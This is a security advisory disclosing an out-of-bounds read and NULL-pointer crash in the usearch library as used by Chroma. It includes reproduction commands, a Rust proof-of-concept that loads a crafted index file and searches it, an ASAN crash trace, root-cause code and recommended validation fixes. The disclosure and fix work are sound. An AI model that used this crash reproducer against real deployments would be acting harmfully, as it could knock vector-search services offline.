What happened?
usearch Out-of-Bounds Read via Malicious Index File
Author(s): Nabih — Fuzzing Labs (nabih@fuzzinglabs.com)
Date: 2026-05-01
Executive Summary
A maliciously crafted usearch index file can trigger an out-of-bounds memory read leading to a NULL pointer dereference and deterministic application crash (Denial of Service) when loaded and then searched by Chroma. The root cause is that the serialized index format stores matrix_rows (node count) and matrix_cols (bytes per vector) as untrusted 32-bit fields; usearch's load_from_stream accepts these values verbatim with no cross-validation against the caller-supplied IndexOptions, causing vectors_lookup_ entries to become NULL. A subsequent search call passes that NULL pointer as the b_scalars argument to the NEON SIMD dot-product kernel, which immediately faults on the zero page.
ASAN confirms the crash (PID 63499): x[1] = 0x0000000000000000 is the NULL b_scalars pointer; x[0] = 0x0000602000000130 is the valid query vector (a_scalars); x[2] = 0x2 is count_scalars (dims = 2). The crash is deterministic and reproduces on every run against the provided artifact.
Vulnerability Details
- Severity: High (CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
- CWE: CWE-125 (Out-of-Bounds Read), CWE-476 (NULL Pointer Dereference), CWE-20 (Improper Input Validation)
- Affected Component: usearch C++ library, include/usearch/index_dense.hpp, function load_from_stream(); crash site: simsimd_dot_f32_neon() (binary offset +0x14c)

| Component | Version | Notes |
|---|---|---|
| chroma-index (Rust crate) | All versions using usearch feature | Direct consumer of usearch::Index::load_from_buffer |
| usearch (Rust bindings + C++ library) | = 2.23 (pinned) | Root cause in C++ library |
| unum-cloud/usearch (upstream C++) | Confirmed in v2.x | include/usearch/index_dense.hpp, load_from_stream |
| simsimd (transitive dep) | 6.x | Crash site: simsimd_dot_f32_neon |
Environment
- Distro Version: macOS/AArch64 (Apple M-series)
- Additional Details: chroma-core/chroma repository, rust/index/fuzz/ crate; usearch 2.23 pinned in Cargo.toml
Steps to Reproduce
- Clone the Chroma repository and enter the fuzz crate:
    git clone https://github.com/chroma-core/chroma
    cd chroma/rust/index/fuzz
- Build with ASAN:
    RUSTFLAGS="-Zsanitizer=address" cargo +nightly build --bin poc_asan_test --target aarch64-apple-darwin
- Run against the provided crash artifact:
    ./target/aarch64-apple-darwin/debug/poc_asan_test \
        artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
        2
Proof of Concept
use usearch::{Index, IndexOptions, MetricKind, ScalarKind};
fn main() {
    let args: Vec<String> = std::env::args().collect();
    if args.len() < 2 {
        eprintln!("Usage: {} <crafted_binary> [dims] [metric]", args[0]);
        std::process::exit(1);
    }
    let path = &args[1];
    let dims: usize = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(8);
    let metric = match args.get(3).map(|s| s.as_str()) {
        Some("cos") => MetricKind::Cos,
        Some("l2") => MetricKind::L2sq,
        _ => MetricKind::IP,
    };
    let data = std::fs::read(path).unwrap_or_else(|e| {
        eprintln!("Failed to read {}: {}", path, e);
        std::process::exit(1);
    });
    let node_count = u32::from_le_bytes(data[0..4].try_into().unwrap());
    let byte_size = u32::from_le_bytes(data[4..8].try_into().unwrap());
    println!("Header: node_count={}, byte_size={}", node_count, byte_size);
    let options = IndexOptions {
        dimensions: dims,
        metric,
        quantization: ScalarKind::F32,
        connectivity: 32,
        expansion_add: 128,
        expansion_search: 64,
        multi: false,
    };
    let index = Index::new(&options).unwrap();
    println!("Calling load_from_buffer...");
    match index.load_from_buffer(&data) {
        Ok(_) => {
            println!("Loaded OK: size={}, capacity={}", index.size(), index.capacity());
            let query = vec![1.0f32; dims];
            println!("Calling search({} dims, k=10)...", dims);
            match index.search(&query, 10) { // <-- CRASH: b_scalars=NULL in SIMD kernel
                Ok(r) => println!("Search OK: {} results", r.keys.len()),
                Err(e) => println!("Search error: {}", e),
            }
        }
        Err(e) => println!("Load failed: {}", e),
    }
}
Root Cause Analysis
The serialized usearch dense index format begins with two attacker-controlled 32-bit fields:
Offset 0..3 : matrix_rows (u32 LE) — number of stored vectors
Offset 4..7 : matrix_cols (u32 LE) — bytes per vector (dims × sizeof(scalar))
Offset 8..N : raw vector data — matrix_rows × matrix_cols bytes
Offset N.. : "usearch" magic + HNSW header + graph adjacency data
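As a rough illustration of the layout above, the following Rust sketch reads the two header fields and computes offset N, the first byte after the raw vector data. It assumes the layout exactly as listed here (two little-endian u32 fields followed by matrix_rows × matrix_cols bytes). The names DenseLayout and parse_dense_layout are hypothetical and are not part of usearch or Chroma.

```rust
use std::convert::TryInto;

/// Section offsets derived from the 8-byte header (hypothetical helper type).
#[derive(Debug, PartialEq)]
pub struct DenseLayout {
    pub matrix_rows: u32,
    pub matrix_cols: u32,
    /// Offset N: the first byte after the raw vector data.
    pub vectors_end: u64,
}

/// Parses the two leading u32 LE fields.
/// Returns None when the buffer is shorter than the 8-byte header.
pub fn parse_dense_layout(data: &[u8]) -> Option<DenseLayout> {
    let rows = u32::from_le_bytes(data.get(0..4)?.try_into().ok()?);
    let cols = u32::from_le_bytes(data.get(4..8)?.try_into().ok()?);
    // The product of two u32 values plus 8 always fits in a u64,
    // so widening first avoids any wrap-around.
    let vectors_end = 8 + u64::from(rows) * u64::from(cols);
    Some(DenseLayout {
        matrix_rows: rows,
        matrix_cols: cols,
        vectors_end,
    })
}
```

For a well-formed index holding 16 two-dimensional f32 vectors, matrix_cols would be 2 × 4 = 8 and the vector data would end at offset 8 + 16 × 8 = 136. Comparing vectors_end with the buffer length is one way to notice that a header claims more vector data than the file contains.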
Inside index_dense.hpp (~line 1101), load_from_stream reads these fields and uses them directly:
std::uint32_t dimensions[2];
input(&dimensions, sizeof(dimensions));
matrix_rows = dimensions[0]; // attacker-controlled
matrix_cols = dimensions[1]; // attacker-controlled
vectors_lookup_ = vectors_lookup_t(matrix_rows);
for (std::uint64_t slot = 0; slot != matrix_rows; ++slot) {
    byte_t* vector = vectors_tape_allocator_.allocate(matrix_cols);
    input(vector, matrix_cols);
    vectors_lookup_[slot] = vector; // stores raw pointer; may be NULL if matrix_cols=0
}
Neither field is validated against metric_.bytes_per_vector() or the actual buffer length. When matrix_cols is inconsistent with the graph section that follows, vectors_lookup_ entries end up NULL. During search, the metric proxy fetches the stored pointer by graph-node slot and passes it as b_scalars to the SIMD kernel. ASAN confirms this pointer is 0x0 at x[1], causing a READ fault on the zero page inside simsimd_dot_f32_neon.
Detailed Behavior
load_from_buffer returns Ok(()) and the index reports size=16, capacity=16, so it appears healthy. The crash occurs only on the first search call, which means checking the result of the load does not detect the malformed file.
RUSTFLAGS="-Zsanitizer=address" cargo +nightly build \
--bin poc_asan_test --target aarch64-apple-darwin && \
./target/aarch64-apple-darwin/debug/poc_asan_test \
artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
2
AddressSanitizer:DEADLYSIGNAL
=================================================================
==63499==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000104d02450 bp 0x00016b11be30 sp 0x00016b11be20 T0)
==63499==The signal is caused by a READ memory access.
==63499==Hint: address points to the zero page.
#0 0x000104d02450 in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c (poc_asan_test:arm64+0x100022450)
#1 0x000104cf94e4 in bool unum::usearch::index_gt<...>::search_to_find_in_base_<...>(...) const+0x454 (poc_asan_test:arm64+0x1000194e4)
#2 0x000104cf8dfc in unum::usearch::index_gt<...>::search_result_t unum::usearch::index_gt<...>::search<...>(...) const+0x1ac (poc_asan_test:arm64+0x100018dfc)
#3 0x000104cf8be4 in unum::usearch::index_dense_gt<...>::search_result_t unum::usearch::index_dense_gt<...>::search_<float, ...>(...) const+0xdc (poc_asan_test:arm64+0x100018be4)
#4 0x000104cf1958 in Matches search_<float>(...)+0x180 (poc_asan_test:arm64+0x100011958)
#5 0x000104cf17c0 in NativeIndex::search_f32(rust::cxxbridge1::Slice<float const>, unsigned long) const+0x50 (poc_asan_test:arm64+0x1000117c0)
#6 0x000104cf122c in cxxbridge1$194$NativeIndex$search_f32+0x18 (poc_asan_test:arm64+0x10001122c)
#7 0x000104cec72c in usearch::ffi::NativeIndex::search_f32::hf7202973838dba99+0x1f4 (poc_asan_test:arm64+0x10000c72c)
#8 0x000104ceb930 in _$LT$f32$u20$as$u20$usearch..VectorType$GT$::search::h252537b2eebe9ad0+0x44 (poc_asan_test:arm64+0x10000b930)
#9 0x000104ceb5ec in usearch::Index::search::h950c1e77d154d0b2 lib.rs:1144
#10 0x000104ce5dc4 in poc_asan_test::main::h6b9971fd57940859 poc_asan_test.rs:68
#11 0x000104ce0f94 in core::ops::function::FnOnce::call_once::hdb553c66484e4abe function.rs:250
#12 0x000104ce7f34 in std::sys::backtrace::__rust_begin_short_backtrace::h0fa6ff76a94e7bea backtrace.rs:158
#13 0x000104ce6d78 in std::rt::lang_start::{{closure}}::h845c899ffc3a2359 rt.rs:206
#14 0x000104d24e50 in std::rt::lang_start_internal::h5feb7ac2538e01ae+0x3fc (poc_asan_test:arm64+0x100044e50)
#15 0x000104ce6cac in std::rt::lang_start::h855a994d46e40637 rt.rs:205
#16 0x000104ce6518 in main+0x20 (poc_asan_test:arm64+0x100006518)
==63499==Register values:
x[0] = 0x0000602000000130 x[1] = 0x0000000000000000 x[2] = 0x0000000000000002 x[3] = 0x000000016b11be28
x[4] = 0x0000612000000240 x[5] = 0x0000000000000001 x[19] = 0x000061d000000080 x[20] = 0x0000000000000040
x[24] = 0x0000614000000040 x[25] = 0x0000000000000100 x[26] = 0x000061d0000000b0
SUMMARY: AddressSanitizer: SEGV (poc_asan_test:arm64+0x100022450) in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c
==63499==ABORTING
The register dump is consistent with the AArch64 calling convention, which passes the first integer and pointer arguments in x0 through x7, in the order of the kernel's signature (two float pointers, a count, and a result pointer):
x[0] = 0x0000602000000130: a_scalars, the query vector, heap-allocated and valid
x[1] = 0x0000000000000000: b_scalars, the stored-vector pointer from vectors_lookup_[slot], NULL due to the corrupted header; this is the faulting address
x[2] = 0x2: count_scalars, 2, matching the dims=2 argument passed to the PoC
The fault is a READ at address 0x0 on the first loop iteration of simsimd_dot_f32_neon. The crash is fully deterministic. No write occurs and the faulting address is always NULL, so the demonstrated impact is a denial of service rather than memory corruption.
Recommendations
- Short-term (Chroma-side): Add a validation wrapper around load_from_buffer in chroma-index before forwarding to usearch: verify matrix_cols == expected_dims * scalar_bytes and 8 + matrix_rows * matrix_cols <= data.len(), computing the product in 64-bit arithmetic so it cannot wrap. Return a ChromaError on any violation.
- Long-term (upstream usearch): Fix load_from_stream in include/usearch/index_dense.hpp to reject any buffer where matrix_cols != metric_.bytes_per_vector(). Apply the same check to the view (memory-mapped) path where matrix_cols * slot can reference memory outside the mapped region.
- Defense-in-depth: Apply integrity verification (HMAC or content-hash) to index files stored in object storage before loading. Consider running the index-loading worker in a sandboxed subprocess (e.g., under seccomp on Linux) to contain crashes. Enable ASAN in CI fuzz runs to catch regressions.
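The short-term check could look roughly like the Rust sketch below. It is a minimal illustration, not Chroma's implementation: the function name check_dense_header and the HeaderError type are hypothetical (a real wrapper would presumably map failures to a ChromaError), and it assumes the 8-byte header layout described under Root Cause Analysis. It implements only the two checks named in the recommendation; whether they are sufficient for every malformed file is not established here.

```rust
use std::convert::TryInto;

/// Reasons a buffer is rejected before it reaches usearch (hypothetical type).
#[derive(Debug, PartialEq)]
pub enum HeaderError {
    /// Fewer than 8 bytes: the header itself is missing.
    TooShort,
    /// matrix_cols does not equal expected_dims * scalar_bytes.
    WrongVectorWidth { expected: u64, found: u32 },
    /// The header claims more vector data than the buffer holds.
    TruncatedVectors { needed: u64, available: u64 },
}

/// Validates the two untrusted header fields against the caller's options.
pub fn check_dense_header(
    data: &[u8],
    expected_dims: usize,
    scalar_bytes: usize,
) -> Result<(), HeaderError> {
    if data.len() < 8 {
        return Err(HeaderError::TooShort);
    }
    let rows = u32::from_le_bytes(data[0..4].try_into().unwrap());
    let cols = u32::from_le_bytes(data[4..8].try_into().unwrap());

    // Check 1: bytes per vector must match the configured dimensions.
    let expected = (expected_dims as u64).saturating_mul(scalar_bytes as u64);
    if u64::from(cols) != expected {
        return Err(HeaderError::WrongVectorWidth { expected, found: cols });
    }

    // Check 2: header plus vector section must fit in the buffer.
    // Widening to u64 first means the product of two u32 values cannot wrap.
    let needed = 8 + u64::from(rows) * u64::from(cols);
    let available = data.len() as u64;
    if needed > available {
        return Err(HeaderError::TruncatedVectors { needed, available });
    }
    Ok(())
}
```

A caller would run check_dense_header(&data, dims, 4) for f32 vectors and only call load_from_buffer when it returns Ok(()). Because the width check compares against a non-zero expected value whenever expected_dims is non-zero, a header with matrix_cols = 0 is rejected as well.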